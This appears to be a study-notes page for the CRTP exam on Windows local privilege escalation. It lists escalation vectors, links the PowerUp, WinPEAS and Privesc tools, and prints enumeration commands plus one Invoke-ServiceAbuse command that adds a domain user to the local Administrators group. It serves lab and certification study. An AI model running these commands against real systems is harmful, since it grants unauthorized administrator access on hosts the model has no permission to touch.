Local Privilege Escalation

The CRTP exam consists of 5 target servers in addition to a foothold student machine. The goal is to OS level command execution on all 5 targets not matter what the privileges of the user.

Vectors

There are various ways of locally escalating privileges on Windows box:

  • Missing patches โ€“ Automated deployment and AutoLogon passwords in clear text

  • AlwaysInstallElevated (Any user can run MSI as SYSTEM)

  • Misconfigured Services โ€“ DLL Hijacking and more

  • NTLM Relaying a.k.a. Won't Fix

This guide offer a sufficiently comprehensive overview of the course material for local privilege escalation

https://github.com/0xStarlight/CRTP-Notes/blob/main/2-Local-Priv-Esc/1-Local-PrivEsc.md

Tools

PowerUp

LogoPowerSploit/PowerUp.ps1 at master ยท PowerShellMafia/PowerSploitGitHub

WinPEAS

LogoPEASS-ng/winPEAS at master ยท carlospolop/PEASS-ngGitHub

Privesc

LogoGitHub - enjoiz/Privesc: Windows batch script that finds misconfiguration issues which can lead to privilege escalation.GitHub

Automated checks

# PowerUp
Invoke-AllChecks

# winPEAS
winPEASx64.exe 

# Privesc
Invoke-PrivEsc

Services

Find vulnerable service configuration

# Get services with unquoted paths and spaces
Get-ServiceUnquoted -Verbose

# Get services where current user can write to binary path
Get-ModifiableServiceFile -Verbose

# Get the services whose configuration current user can modify
Get-ModifiableService -Verbose

Add domain user to the local Administrators group

Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\studentx' -Verbose

Last updated

Was this helpful?